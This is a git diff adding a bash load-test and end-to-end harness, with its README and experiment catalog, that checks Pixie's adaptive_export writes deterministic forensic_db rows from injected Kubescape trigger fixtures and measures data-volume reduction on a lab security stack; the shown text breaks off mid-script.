diff --git a/src/e2e_test/adaptive_export_loadtest/README.md b/src/e2e_test/adaptive_export_loadtest/README.md new file mode 100644 index 00000000000..f0e94a54fdf --- /dev/null +++ b/src/e2e_test/adaptive_export_loadtest/README.md @@ -0,0 +1,72 @@ +# adaptive_export_loadtest + +Load-test + e2e harness for **adaptive_export (AE)** and the dx-steered SOC chain. +There are exactly **two ways to test**, by design — pick by what you're proving: + +| family | needs a live SOC stack? | proves | entry point | +|---|---|---|---| +| **A. Fixture-isolation** | No (just ClickHouse) | AE's write behaviour is *deterministic* — injected `kubescape_logs` → exact `forensic_db` rows, across many reps | `harness/run.sh` | +| **B. Live-attack e2e** | Yes (Pixie + kubescape + CH + AE + dx) | the real chain: attack → detection → DX-steered data-volume reduction → no-loss → NFR | `harness/log4shell_fire.sh` → `exp_matrix.sh` → `nfr.sh` → `exp_row_reconcile.sh` | + +`event_time` is unix **SECONDS** end-to-end (the unit the soc Vector kubescape sink emits and the CH DDL TTL/PARTITION assume). Fixtures use seconds. + +--- + +## A. Fixture-isolation (offline AE proof — no Pixie) + +Injects *controlled* `kubescape_logs` trigger rows (real kubescape is **not** deployed) and a *counted* traffic band, then asserts exactly how much AE writes — so write behaviour is measured deterministically instead of lost in infra noise. + +```sh +export KUBECONFIG=<path/to/kubeconfig> # or run lab-side with CH_NO_PF=1 +bash harness/run.sh # full suite: ae_config → E1..E4,E6 → E5 +EXP=E1 REPS=20 OUT=/tmp/E1.csv bash harness/exp_control.sh # one experiment +EXP=E8 TICKS=25 INTERVAL=3 bash harness/exp_e8.sh # sustained same-pod (F8 reproducer) +``` +Exact reproducibility ⇔ `harness/stats.py` reports every `*_act` metric with one distinct value (std=0). 
+ +**Scripts:** `run.sh` (orchestrator) · `lib.sh` (CH/kubectl helpers) · `inject.sh` (HTTP INSERT of kubescape_logs) · `ae_config.sh` (AE single-shot load-test mode) · `exp_control.sh` (E1–E4,E6) · `exp_e5.sh` (data-plane volume) · `exp_e8.sh` (sustained same-pod / F8) · `stats.py` (reproducibility verdict). + +## B. Live-attack e2e (the real chain, on a deployed stack) + +Run on a SOC stack (Pixie vizier Healthy + kubescape netStreaming + CH `forensic_db` + AE + dx). Order: + +```sh +export KUBECONFIG= +# 1. generate the attack signal (idempotent; verifies LDAP egress before returning) +bash harness/log4shell_fire.sh +# 2. data-volume reduction MATRIX — ALL (firehose) vs DX (steered) × {log4shell,argocd,react2argo} +CONDITIONS="log4shell:on react2argo:on" REPS=5 bash harness/exp_matrix.sh +# 3. NFR — throughput, AE+dx memory under load, verdict/query latency +bash harness/nfr.sh +# 4. no-loss — deterministic PEM↔ClickHouse row-level reconciliation for the DX arm +bash harness/exp_row_reconcile.sh +``` + +**Scripts:** `log4shell_fire.sh` (attack-signal generator, bob#140-hardened) · `exp_matrix.sh` (reduction matrix, the canonical ALL-vs-DX runner) · `nfr.sh` (throughput/mem/latency) · `exp_row_reconcile.sh` (no-loss). + +> The DX arm needs the load-gen pods bound to a **benign User SBoB** (`kubescape.io/managed-by: User`, `rulePolicies.R0002.processAllowed`) or benign noise gets steered and contaminates the reduction — see `biz/PoC/log4j/datavolume/denoise_sbobs/`. + +--- + +## Layout +``` +fixtures/EXPERIMENTS.md curated kubescape_logs data-set catalog + expected outputs +harness/ the two families above +k8s/ isolated sinks + per-rep generator pod (no probes) +tools/loadgen/ cleanloadgen + httpsink Go sources + Dockerfile +``` +Go unit/e2e tests for AE live with the service: `src/vizier/services/adaptive_export/internal/{trigger,e2e}/*_test.go`. + +See `CONTRACTS.md` (AE implied contracts) and `FINDINGS_AND_BACKLOG.md` (reproduced findings incl. 
the F8 watermark-poison bug). + +## Validation status (honest) + +| Experiment | Plane | Status | +|---|---|---| +| E1 single / E2 dedup / E3 fan-out / E4 boundary / E6 restart-idempotency | control | ✅ exactly reproducible (std=0) on a live rig | +| E8 sustained same-pod | control | ✅ reproduced the F8 "writes-stop" bug + recovery | +| E5 volume / E8 data-mode | data | ⏳ authored; pending live validation | +| Live log4j reduction / NFR / no-loss (family B) | data | ✅ validated (aeprod19 + pemdq10 + dx): #33 prefetch verdict 212→18ms; reduction ALL→DX ≫ measured | + +## Removed (consolidation 2026-06) +Redundant variants folded into the canonical scripts above — deleted: `ae_vs_all.sh`, `vrun.sh`, `exp_log4j_reps.sh`, `exp_datavolume_extreme.sh`, `exp_dx_steering_reduction.sh` (→ `exp_matrix.sh`); `exp_ae_nfr_benchmark.sh` (→ `nfr.sh`); `exp_pipeline_reconcile.sh` (→ `exp_row_reconcile.sh`); `exp_dx_validate.sh` (→ `exp_matrix.sh`); `deploy_ae.sh`, `build_gen_image.sh` (superseded by the live stack / kit). diff --git a/src/e2e_test/adaptive_export_loadtest/fixtures/EXPERIMENTS.md b/src/e2e_test/adaptive_export_loadtest/fixtures/EXPERIMENTS.md new file mode 100644 index 00000000000..35629485c37 --- /dev/null +++ b/src/e2e_test/adaptive_export_loadtest/fixtures/EXPERIMENTS.md @@ -0,0 +1,45 @@ +# AE load-test experiment catalog + +Each experiment is a curated `kubescape_logs` data set (injected via `inject.sh`, +real kubescape NOT deployed) plus the deterministic AE output it must produce. +Run each ×100; **exact reproducibility ⇔ every metric has std = 0 / one distinct +value across the 100 reps.** + +Two planes (see `project_ae_repro_planes`): +- **Control plane** — `adaptive_attribution`, `trigger_watermark`: a pure + function of the injected rows. No Pixie, no traffic gen needed. +- **Data plane** — `http_events`/`dns_events`/`pgsql_events`/`conn_stats`: real + Pixie capture of `cleanloadgen`'s sealed band; gen manifest counts are the + oracle. 
Requires the L3 topology + single-pull AE config. + +Per-rep isolation: unique `--pod cp-…` (control; `--hostname` must be a real node because AE polls per node, +so reps are separated by their distinct `anomaly_hash`) and unique `--pod gen-…` (data, AE's `df.pod` filter +isolates each rep even with overlapping windows). Timestamps are explicit unix +seconds (the production `event_time` unit): control fixtures stamp the current second (`now_s`) so the watermark tracks real time; E5 uses the gen manifest's band end `B1` converted from nanos. + +| # | Plane | Injected data set | Expected (per rep, exact unless noted) | +|---|---|---|---| +| **E1** single anomaly | control | 1 row: rule R0001, target (ns,pod), pid/comm fixed, `event_time=T` | `uniqExact(anomaly_hash)=1`; `adaptive_attribution` FINAL `=1`; watermark `=T` | +| **E2** dedup / extend | control | 10 rows, SAME (pid,comm,pod,ns), distinct ↑ `event_time` (`--count 10`) | hashes `=1`; attribution FINAL `=1` (t_end extended, not multiplied); watermark `=T+9·dt` | +| **E3** fan-out | control | K=8 rows, distinct (pod,ns), 1 each | hashes `=8`; attribution FINAL `=8` | +| **E4** boundary collision | control | 2 rows, identical `event_time`, different RuleID, same target (`--same-time`) | deterministic fingerprint-dedup: both surface (distinct fp), hashes `=1`; watermark `=T` | +| **E5** data-plane volume | data | 1 anomaly, `pod=gen-…`, `event_time=B1` from gen manifest; gen fires HTTP_N=100/DNS_N=100/PGSQL_N=100 in band `[B0,B1]` | `Δhttp_events=100`, `Δdns_events=100`, `Δpgsql_events=100`; `Δattribution=1`; `conn_stats` within tolerance; single-pull (no MergeTree dup inflation) | +| **E6** watermark idempotency | control | inject E1 set, let AE process, restart AE (watermark persisted), re-run | 2nd pass: `Δ` everything `=0` (no double-count) | +| **E7** passthrough A/B | data | canned band; `ADAPTIVE_PASSTHROUGH` 1 then 0, same load+window | exact firehose/filter ratio per table; reproducible across reps | + +## Timestamp coordination (data-plane, E5/E7) + +1. gen fires → sealed band `[B0,B1]` in unix nanos (node clock == Pixie `time_` == kubescape + `event_time`; no skew). +2. inject fixture `--event-time ⌊B1/1e9⌋ --pod gen-…` (`event_time` is unix seconds). +3. 
AE config: `ADAPTIVE_WINDOW_BEFORE_SEC ≥ (B1−B0)/1e9 + margin` so window start + `≤ B0`; `ADAPTIVE_WINDOW_AFTER_SEC` small → window expires after ONE pull + (protocol tables are plain MergeTree — repeated pulls would re-insert dups). +4. measure forensic_db deltas BEFORE the band ages out of Pixie retention. +5. delete `gen--` (held alive until here so upid resolves). + +## Default knobs + +- `HTTP_N=DNS_N=PGSQL_N=100` (low enough for 100% Pixie sampling, no drops). +- `conn_stats` tolerance: `Δconn ∈ [HTTP_N, HTTP_N+5]` (new-conn-per-req + 1 pg). +- `async_insert=0` on the ingest user so counts are stable at read time. diff --git a/src/e2e_test/adaptive_export_loadtest/harness/ae_config.sh b/src/e2e_test/adaptive_export_loadtest/harness/ae_config.sh new file mode 100755 index 00000000000..1f7782e927f --- /dev/null +++ b/src/e2e_test/adaptive_export_loadtest/harness/ae_config.sh @@ -0,0 +1,57 @@ +#!/usr/bin/env bash + +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +# ae_config.sh — put the live adaptive-export into deterministic load-test mode. 
+# +# Sets (and rolls out) the env that makes the data-plane write exactly once per +# anomaly window over the full sealed band: +# ADAPTIVE_PUSH_PIXIE_ROWS=true operator pulls + writes protocol tables +# ADAPTIVE_PUSH_REFRESH_SEC=-1 SINGLE-SHOT: one pull per window (only on +# a rebuilt AE image carrying the new knob; +# harmless/ignored on older images) +# ADAPTIVE_WINDOW_BEFORE_SEC=120 window start ≤ band start (band is seconds) +# ADAPTIVE_WINDOW_AFTER_SEC=5 member lifetime — the PRIMARY single-pull +# lever that works on the CURRENTLY-PUBLISHED +# image: 5s < the 30s default refresh, so the +# window expires before any 2nd pull → each +# window written exactly once. +# Also disables async_insert on the ingest user so row counts are stable at read +# time (per the AE per-PG fixes), and applies the PL_CLOUD_ADDR :443 fix. +set -uo pipefail +HERE="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"; source "$HERE/lib.sh" + +DS="${AE_DS:-adaptive-export}" +log "configuring $AE_NS/$DS for single-shot load-test mode" + +k -n "$AE_NS" set env "ds/$DS" \ + ADAPTIVE_PUSH_PIXIE_ROWS=true \ + ADAPTIVE_PUSH_REFRESH_SEC=-1 \ + ADAPTIVE_WINDOW_BEFORE_SEC=120 \ + ADAPTIVE_WINDOW_AFTER_SEC=5 \ + >/dev/null + +# PL_CLOUD_ADDR :443 fix (idempotent) — without it AE crashloops / 0 writes. 
+CUR="$(k -n "$AE_NS" get cm pl-cloud-config -o jsonpath='{.data.PL_CLOUD_ADDR}' 2>/dev/null || true)" +if [[ -n "$CUR" && "$CUR" != *:* ]]; then + log "patching PL_CLOUD_ADDR $CUR -> ${CUR}:443" + k -n "$AE_NS" patch cm pl-cloud-config --type merge -p "{\"data\":{\"PL_CLOUD_ADDR\":\"${CUR}:443\"}}" >/dev/null +fi + +k -n "$AE_NS" rollout restart "ds/$DS" >/dev/null +k -n "$AE_NS" rollout status "ds/$DS" --timeout=180s +log "AE configured + rolled out" diff --git a/src/e2e_test/adaptive_export_loadtest/harness/exp_control.sh b/src/e2e_test/adaptive_export_loadtest/harness/exp_control.sh new file mode 100755 index 00000000000..783aad584d0 --- /dev/null +++ b/src/e2e_test/adaptive_export_loadtest/harness/exp_control.sh @@ -0,0 +1,115 @@ +#!/usr/bin/env bash + +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +# exp_control.sh — control-plane reproducibility (E1..E4, E6). No Pixie, no gen: +# inject curated kubescape_logs fixtures and assert the deterministic control +# surface (adaptive_attribution FINAL + uniqExact(anomaly_hash) + watermark). +# +# Live-AE constraint: hostname MUST be a real node (AE polls per-node). Per-rep +# isolation is by UNIQUE POD (distinct anomaly_hash) + monotone event_time. 
+# +# Usage: EXP=E1 REPS=100 OUT=/tmp/e1.csv ./exp_control.sh (EXP in E1 E2 E3 E4 E6) +set -uo pipefail +HERE="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"; source "$HERE/lib.sh" +INJECT="$HERE/inject.sh" + +EXP="${EXP:-E1}" +REPS="${REPS:-100}" +NODE="${NODE:-$(first_node)}" +OUT="${OUT:-/tmp/aeload_${EXP}.csv}" + +ch_portforward_up +[[ -n "$NODE" ]] || die "no node resolved (set NODE=)" +log "EXP=$EXP node=$NODE reps=$REPS" +warmup "$NODE" # absorb AE trigger cold-start so rep 1 is steady-state + +inj(){ "$INJECT" --endpoint "$CH_HTTP" --user "$CH_RW_USER" --pass "$CH_RW_PASS" --hostname "$NODE" "$@" >&2; } +# settle: give AE's 250ms trigger poll + write time to land. +settle(){ sleep "${SETTLE_S:-3}"; } + +echo "rep,exp,uniq_exp,uniq_act,attrib_exp,attrib_act,wm_exp,wm_act,pass" | tee "$OUT" +WM_PREV=0 # for monotonicity check (trigger_watermark persists on a ~5s throttle) + +for rep in $(seq 1 "$REPS"); do + # event_time = REAL current second. The trigger watermark is a strict + # high-water-mark (contract C3 / F8): future-dated stamps (BASE+rep*N) push + # the watermark ahead of wall-clock, so later experiments' now-based stamps + # fall BELOW it and are silently dropped. now_s keeps the watermark tracking + # real time → monotone across experiments on the same (per-node) hostname. 
+ T="$(now_s)" + R="$(printf '%03d' "$rep")" # zero-pad → collision-proof LIKE filters + filt=""; uexp=1; aexp=1; wmexp="$T"; idemp="" + case "$EXP" in + E1) # single anomaly + filt="cp-e1-${R}" + inj --ns aeload --pod "$filt" --rule R0001 --pid 1234 --comm java --event-time "$T" || { echo "$rep,$EXP,,,,,,,INJECT_FAIL"|tee -a "$OUT"; continue; } + ;; + E2) # dedup / extend: 10 rows, same target, 1s apart → 1 hash, 1 row + filt="cp-e2-${R}"; wmexp="$((T + 9))" + inj --ns aeload --pod "$filt" --rule R0001 --pid 1234 --comm java --event-time "$T" --count 10 --dt-s 1 || { echo "$rep,$EXP,,,,,,,INJECT_FAIL"|tee -a "$OUT"; continue; } + sleep 8 # let all 10 rows (spanning 9s) be polled before measuring + ;; + E3) # fan-out: 8 distinct pods → 8 hashes. Same event_time (now_s) for all 8 — + # distinct pods → distinct content fingerprints → all 8 surface (boundary + # dedup is per-fingerprint), and the watermark only advances to now_s. + filt="cp-e3-${R}-"; K=8; uexp="$K"; aexp="$K"; wmexp="" + ok=1 + for j in $(seq 1 "$K"); do + inj --ns aeload --pod "${filt}${j}" --rule R0001 --pid "$((1234+j))" --comm java --event-time "$T" || ok=0 + done + [[ "$ok" == 1 ]] || { echo "$rep,$EXP,,,,,,,INJECT_FAIL"|tee -a "$OUT"; continue; } + ;; + E4) # boundary collision: 2 rows, same event_time, different RuleID, same target → 1 hash (BOTH injects must land, else the rep passes vacuously on one row) + filt="cp-e4-${R}" + inj --ns aeload --pod "$filt" --rule R0001 --pid 1234 --comm java --event-time "$T" --same-time || { echo "$rep,$EXP,,,,,,,INJECT_FAIL"|tee -a "$OUT"; continue; } + inj --ns aeload --pod "$filt" --rule R0010 --pid 1234 --comm java --event-time "$T" --same-time || { echo "$rep,$EXP,,,,,,,INJECT_FAIL"|tee -a "$OUT"; continue; } + ;; + E6) # watermark idempotency across AE restart + filt="cp-e6-${R}" + inj --ns aeload --pod "$filt" --rule R0001 --pid 1234 --comm java --event-time "$T" || { echo "$rep,$EXP,,,,,,,INJECT_FAIL"|tee -a "$OUT"; continue; } + wait_attrib "$NODE" "$filt" 1 20 >/dev/null + a1="$(attrib_count "$NODE" "$filt")" + k -n "$AE_NS" rollout restart "ds/${AE_DS:-adaptive-export}" 
>/dev/null 2>&1 || true + k -n "$AE_NS" rollout status "ds/${AE_DS:-adaptive-export}" --timeout=180s >/dev/null 2>&1 || true + sleep 8 + # idempotency: attribution still exactly 1 after restart (no double-count) + [[ "$a1" == "1" ]] || idemp="FAIL_idemp_a1=${a1}" + ;; + *) die "unknown EXP=$EXP";; + esac + + # Poll until AE has written the expected attribution rows (steady-state), + # then read the deterministic counts. wm is persistence-throttled (~5s) so it + # is reported + checked for MONOTONICITY only, never a hard gate. + aact="$(wait_attrib "$NODE" "$filt" "$aexp" "${MEAS_TIMEOUT:-25}")" + uact="$(uniq_hashes "$NODE" "$filt")" + wm="$(watermark_of "$NODE")" + + pass="PASS" + [[ "$uact" == "$uexp" ]] || pass="FAIL_uniq" + [[ "$aact" == "$aexp" ]] || pass="${pass}|FAIL_attrib" + [[ -z "$idemp" ]] || pass="${pass}|${idemp}" + # watermark: must never go backwards (persisted value lags but is monotone). + if [[ "${wm:-0}" -lt "${WM_PREV:-0}" ]]; then pass="${pass}|FAIL_wm_regress"; fi + WM_PREV="$wm" + + echo "$rep,$EXP,$uexp,$uact,$aexp,$aact,$wmexp,$wm,$pass" | tee -a "$OUT" +done + +log "$EXP done -> $OUT" +python3 "$HERE/stats.py" "$OUT" || true diff --git a/src/e2e_test/adaptive_export_loadtest/harness/exp_e5.sh b/src/e2e_test/adaptive_export_loadtest/harness/exp_e5.sh new file mode 100755 index 00000000000..d9237672aa5 --- /dev/null +++ b/src/e2e_test/adaptive_export_loadtest/harness/exp_e5.sh @@ -0,0 +1,98 @@ +#!/usr/bin/env bash + +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
+# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +# exp_e5.sh — E5 live data-plane reproducibility: real Pixie captures a counted, +# sealed, pod-pinned band; AE pulls it ONCE; we assert the forensic_db deltas +# equal the generator's ground truth, across REPS reps. +# +# Output CSV (stdout + $OUT): rep,http_exp,http_act,dns_exp,dns_act,pgsql_exp, +# pgsql_act,conn_est,conn_act,attrib,uniq_hash,wm_exp,wm_act,pass +# +# Usage: REPS=100 HTTP_N=100 DNS_N=100 PGSQL_N=100 OUT=/tmp/e5.csv ./exp_e5.sh +set -uo pipefail +HERE="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"; source "$HERE/lib.sh" +INJECT="$HERE/inject.sh" + +REPS="${REPS:-100}" +HTTP_N="${HTTP_N:-100}"; DNS_N="${DNS_N:-100}"; PGSQL_N="${PGSQL_N:-100}" +CONN_TOL="${CONN_TOL:-5}" # conn_stats tolerance band above HTTP_N+1 +SETTLE_S="${SETTLE_S:-4}" # Stirling flush settle before injecting +PULL_TIMEOUT="${PULL_TIMEOUT:-40}" # max wait for AE single-pull to land +OUT="${OUT:-/tmp/aeload_e5.csv}" + +ch_portforward_up +apply_sinks +# Absorb the AE trigger cold-start on every node (gen pods may land on any node). 
+for n in $(nodes_list); do warmup "$n"; done + +echo "rep,http_exp,http_act,dns_exp,dns_act,pgsql_exp,pgsql_act,conn_est,conn_act,attrib,uniq_hash,wm_exp,wm_act,pass" | tee "$OUT" + +for rep in $(seq 1 "$REPS"); do + name="gen-e5-$(printf '%03d' "$rep")" # zero-pad → collision-proof LIKE filter + + mani="$(fire_gen "$name" "$HTTP_N" "$DNS_N" "$PGSQL_N")" || { echo "$rep,,,,,,,,,,,,,FIRE_FAIL" | tee -a "$OUT"; continue; } + b1="$(jget "$mani" b1)" # band end, unix NANOS (gen clock) + b1_s=$(( b1 / 1000000000 )) # → unix SECONDS = production event_time unit + http_exp="$(jget "$mani" http)"; dns_exp="$(jget "$mani" dns)"; pgsql_exp="$(jget "$mani" pgsql)" + conn_est="$(jget "$mani" conn_tcp_est)" + # Fixture hostname MUST be the node the gen pod landed on, so the AE pod on + # that node reads the trigger (AE polls kubescape_logs WHERE hostname=node). + node="$(jget "$mani" node)" + [[ -n "$node" ]] || { del_gen "$name"; echo "$rep,,,,,,,,,,,,,NO_NODE" | tee -a "$OUT"; continue; } + + sleep "$SETTLE_S" # let the band flush into Pixie before the window query + + # Inject the single trigger fixture pinned to THIS rep's pod, event_time=B1. + "$INJECT" --endpoint "$CH_HTTP" --user "$CH_RW_USER" --pass "$CH_RW_PASS" \ + --ns "$AELOAD_NS" --pod "$name" --rule R0001 --pid 1234 --comm java \ + --event-time "$b1_s" --hostname "$node" >&2 \ + || { del_gen "$name"; echo "$rep,,,,,,,,,,,,,INJECT_FAIL" | tee -a "$OUT"; continue; } + + # Wait for AE's single pull to land (http_events for this pod reaches exp, or + # timeout). The pod stays alive (held) so upid resolves during the pull. 
+ http_act=0 + for _ in $(seq 1 "$PULL_TIMEOUT"); do + http_act="$(count_pod http_events "$name")" + [[ "$http_act" -ge "$http_exp" ]] && break + sleep 1 + done + dns_act="$(count_pod dns_events "$name")" + pgsql_act="$(count_pod pgsql_events "$name")" + conn_act="$(count_pod conn_stats "$name")" + attrib="$(attrib_count "$node" "$name")" + uhash="$(uniq_hashes "$node" "$name")" + wm_act="$(watermark_of "$node")" + + pass="PASS" + [[ "$http_act" == "$http_exp" ]] || pass="FAIL_http" + [[ "$dns_act" == "$dns_exp" ]] || pass="${pass}|FAIL_dns" + [[ "$pgsql_act" == "$pgsql_exp" ]] || pass="${pass}|FAIL_pgsql" + [[ "$attrib" == "1" ]] || pass="${pass}|FAIL_attrib" + # watermark persists on a ~5s throttle → report only (WARN), don't hard-gate. + [[ "$wm_act" == "$b1_s" ]] || pass="${pass}|WARN_wm" + # conn_stats: tolerance gate (sampled cumulative counters), not exact. + if [[ "$conn_act" -lt "$conn_est" || "$conn_act" -gt $((conn_est + CONN_TOL)) ]]; then + pass="${pass}|WARN_conn" + fi + + echo "$rep,$http_exp,$http_act,$dns_exp,$dns_act,$pgsql_exp,$pgsql_act,$conn_est,$conn_act,$attrib,$uhash,$b1_s,$wm_act,$pass" | tee -a "$OUT" + del_gen "$name" +done + +log "E5 done -> $OUT" +python3 "$HERE/stats.py" "$OUT" || true diff --git a/src/e2e_test/adaptive_export_loadtest/harness/exp_e8.sh b/src/e2e_test/adaptive_export_loadtest/harness/exp_e8.sh new file mode 100755 index 00000000000..e194733f932 --- /dev/null +++ b/src/e2e_test/adaptive_export_loadtest/harness/exp_e8.sh @@ -0,0 +1,98 @@ +#!/usr/bin/env bash + +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. 
+# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +# exp_e8.sh — SUSTAINED same-pod-over-time: the bug-hunt for "writes succeed +# initially, then STOP, while the data is still on the Pixie side." +# +# One long-lived pod keeps producing NEW kubescape anomalies over time. A healthy +# AE keeps processing every new anomaly: adaptive_attribution.n_anomalies grows, +# last_seen advances, the active window stays open, and (data mode) protocol rows +# keep being written. A STALL — n_anomalies / last_seen freezing while we keep +# injecting — reproduces the production symptom. +# +# MODE=control (default): inject anomalies + track n_anomalies/last_seen/watermark +# over TICKS. No Pixie needed. Catches a trigger/watermark/dedup-side stall. +# MODE=data: ALSO run a held gen pod producing continuous HTTP/DNS/PGSQL traffic, +# and track per-pod protocol-table row growth (needs a registered vizier). +# +# event_time is unix SECONDS (production unit). BURST>1 injects BURST anomalies at +# the SAME event_time per tick — the realistic "many R0001 in one second" shape +# that probes the watermark-boundary fingerprint dedup (prime suspect). 
+# +# Usage: MODE=control TICKS=40 INTERVAL=3 BURST=1 OUT=/tmp/e8.csv ./exp_e8.sh +set -uo pipefail +HERE="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"; source "$HERE/lib.sh" +INJECT="$HERE/inject.sh" + +MODE="${MODE:-control}" +TICKS="${TICKS:-40}" +INTERVAL="${INTERVAL:-3}" # seconds between ticks +BURST="${BURST:-1}" # anomalies per tick (same event_time if >1) +NODE="${NODE:-$(first_node)}" +OUT="${OUT:-/tmp/aeload_e8_${MODE}.csv}" +POD="${POD:-sus-$(now_s)}" # the one sustained pod under test + +ch_portforward_up +[[ -n "$NODE" ]] || die "no node resolved" +log "E8 sustained: mode=$MODE node=$NODE pod=$POD ticks=$TICKS interval=${INTERVAL}s burst=$BURST" +warmup "$NODE" + +GEN="" +if [[ "$MODE" == "data" ]]; then + apply_sinks + GEN="$POD" # the gen pod name == the fixture pod (df.pod filter isolates it) + # Long-lived gen that keeps firing: we re-fire by leaving it running and + # re-injecting triggers; the gen's band is its startup burst, but the active + # window re-queries the SAME pod each tick. (Continuous-traffic gen variant is + # a follow-up; this already exercises sustained re-query of one pod.) + fire_gen "$GEN" "${HTTP_N:-100}" "${DNS_N:-100}" "${PGSQL_N:-100}" >/dev/null || die "gen fire failed" + node="$(k -n "$AELOAD_NS" get pod "$GEN" -o jsonpath='{.spec.nodeName}' 2>/dev/null)"; [[ -n "$node" ]] && NODE="$node" + log "data mode: gen $GEN on node $NODE" +fi + +echo "tick,t_unix,event_time,n_anomalies,last_seen,watermark,http_rows,delta_n,status" | tee "$OUT" +prev_n=0 +for tick in $(seq 1 "$TICKS"); do + T="$(now_s)" + # Inject BURST anomalies for the SAME pod at this tick's event_time. 
+ if [[ "$BURST" -gt 1 ]]; then + "$INJECT" --endpoint "$CH_HTTP" --user "$CH_RW_USER" --pass "$CH_RW_PASS" \ + --hostname "$NODE" --ns "$AELOAD_NS" --pod "$POD" --rule R0001 --pid 1234 --comm java \ + --event-time "$T" --count "$BURST" --same-time >&2 || true + else + "$INJECT" --endpoint "$CH_HTTP" --user "$CH_RW_USER" --pass "$CH_RW_PASS" \ + --hostname "$NODE" --ns "$AELOAD_NS" --pod "$POD" --rule R0001 --pid 1234 --comm java \ + --event-time "$T" >&2 || true + fi + sleep "$INTERVAL" + + n="$(attr_field "$NODE" "$POD" n_anomalies)" + ls="$(attr_field "$NODE" "$POD" 'toUnixTimestamp(last_seen)')" + wm="$(watermark_of "$NODE")" + http="0"; [[ "$MODE" == "data" ]] && http="$(count_pod http_events "$POD")" + delta=$(( ${n:-0} - prev_n )) + status="OK" + [[ "$tick" -gt 1 && "$delta" -le 0 ]] && status="STALL" # n_anomalies stopped growing + prev_n="${n:-0}" + echo "$tick,$T,$T,$n,$ls,$wm,$http,$delta,$status" | tee -a "$OUT" +done + +[[ "$MODE" == "data" && -n "$GEN" ]] && del_gen "$GEN" +log "E8 done -> $OUT" +# Summary: did it ever stall, and at which tick? +awk -F, 'NR>1{tot++; if($9=="STALL")stall++} END{printf "[aeload] E8 %s: %d ticks, %d STALL ticks (%s)\n", "'"$MODE"'", tot, stall+0, (stall+0==0?"sustained-OK":"STALLED — reproduces writes-stop")}' "$OUT" diff --git a/src/e2e_test/adaptive_export_loadtest/harness/exp_matrix.sh b/src/e2e_test/adaptive_export_loadtest/harness/exp_matrix.sh new file mode 100755 index 00000000000..de8a068713a --- /dev/null +++ b/src/e2e_test/adaptive_export_loadtest/harness/exp_matrix.sh @@ -0,0 +1,126 @@ +#!/usr/bin/env bash + +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. 
+# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +# exp_matrix.sh — data-volume reduction MATRIX, runs node-side on the rig. +# CONDITIONS = space-list of ATTACK:NOISE (ATTACK=log4shell|argocd|react2argo, NOISE=off|on) +# For each condition: ALL arm (passthrough firehose) then DX arm (streaming), REPS each, +# 2-min window, single fire at t=60s, truncate all CH + settle between reps, measure every +# forensic_db table. Pre-flight AE guard + per-rep attack-fired (R0001) acceptance gate. +# Skips conditions whose workload isn't deployed (logs SKIP) so it does what it can now. +set -uo pipefail +CONDS=${CONDITIONS:-"log4shell:off log4shell:on argocd:off argocd:on react2argo:off react2argo:on"} +REPS=${REPS:-5}; RUNSEC=${RUNSEC:-120}; FIREAT=${FIREAT:-60}; GAP=${GAP:-180} +NS=log4j-poc; CHPOD=chi-forensic-soc-db-soc-cluster-0-0-0 +OUT=/tmp/matrix.txt; RES=/tmp/matrix.tsv +: > "$OUT"; : > "$RES" +chq(){ kubectl -n clickhouse exec "$CHPOD" -c clickhouse -- clickhouse-client -q "$1" 2>/dev/null; } +say(){ echo "[$(date -u +%H:%M:%S)] $*" | tee -a "$OUT"; } +TABLES=$(chq "SELECT name FROM system.tables WHERE database='forensic_db' AND engine LIKE '%MergeTree%' FORMAT TSV") +truncate_all(){ local t; for t in $TABLES; do chq "TRUNCATE TABLE IF EXISTS forensic_db.\`$t\`" >/dev/null 2>&1; done; } +ensure_healthy(){ local p; p=$(kubectl -n pl get vizier -o jsonpath='{.items[*].status.vizierPhase}' 2>/dev/null) + if [ "$p" != Healthy ]; then kubectl -n pl delete pod -l name=vizier-query-broker >/dev/null 2>&1 + for _ in $(seq 1 20); do [ "$(kubectl -n pl get vizier -o 
